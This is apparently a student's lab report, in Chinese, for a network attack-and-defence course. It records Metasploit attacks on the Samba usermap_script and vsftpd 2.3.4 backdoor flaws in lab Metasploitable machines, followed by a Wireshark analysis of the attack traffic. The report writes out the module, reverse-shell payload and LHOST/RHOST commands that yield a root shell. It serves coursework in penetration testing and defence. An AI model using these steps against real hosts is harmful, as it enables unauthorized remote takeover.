20231905 2022-2023-2 《网络攻防实践》实践七报告

20231905 2022-2023-2 《网络攻防实践》实践七报告

1.实践内容

（1）使用Metasploit进行Linux远程渗透攻击

任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

④设置渗透攻击参数（RHOST，LHOST，TARGET等）；

⑤执行渗透攻击；

⑥查看是否正确得到远程Shell，并查看获得的权限。

（2）实践作业：攻防对抗实践

攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

攻击机：kali 192.168.200.4
靶机：Metasploitable 192.168.200.123
用kali攻击机ping靶机，可以ping通

输入msfconsole，启动Metasploitable软件

输入use exploit/multi/samba/usermap_script，使用该模块进行攻击，输入show payloads查看漏洞的载荷

输入set payload cmd/unix/reverse，选择20号攻击负载模块TCP（reverse）,设置双向连接载荷，输入show options显示需要设置的参数

输入set LHOST 192.168.200.4，设置攻击机为kali；输入set RHOST 192.168.200.123，设置靶机为Metasploitable。
再次输入show options查看是否配置成功

输入exploit进行攻击，连接shell后输入ifconfig查看ip配置信息，与靶机真实IP一致，说明攻击成功，输入whoami查看角色权限为root

使用ls命令查看文件，确认获得的权限

2.2 实践作业：攻防对抗实践

2.2.1 作为攻击方

攻击：192.168.43.18 （20231905）
防守：192.168.43.202 （20231903）
检查从攻击机到靶机的连通性：

启动msfconsole

寻找漏洞代码 （vsftpd），扫描出 vsftpd 漏洞

输入use exploit/unix/ftp/vsftpd_234_backdoor ，并输入指令show payloads查看攻击载荷

分别设置攻击机和靶机的IP地址

开始攻击

查询IP地址，可以发现已经攻击成功，获得防守方靶机远程控制权。

2.2.1 作为防守方

攻击：192.168.43.77 （20231903）
防守：192.168.43.173 （20231905）
攻击过程同上述一致，攻击成功后攻击机状态如下：

防守方对wireshark抓取的信息进行分析

通过追踪TCP流可发现攻击机进行的相关操作，同时找到攻击机对靶机使用Shellcode。

3.学习中遇到的问题及解决

• 问题1：防守方靶机没有wireshark
• 问题1解决方案：防守方开启kali，并将kali连接到同一局域网中，即可用kali中的wireshark抓包

4.实践总结

本次实践主要学习了Linux操作系统攻防，以及渗透攻击的攻击过程，与上次实验有相似之处。更加理解了网络攻防的一般步骤，但同时还要多加强理论知识的学习，才能把网络攻防技术掌握的更好。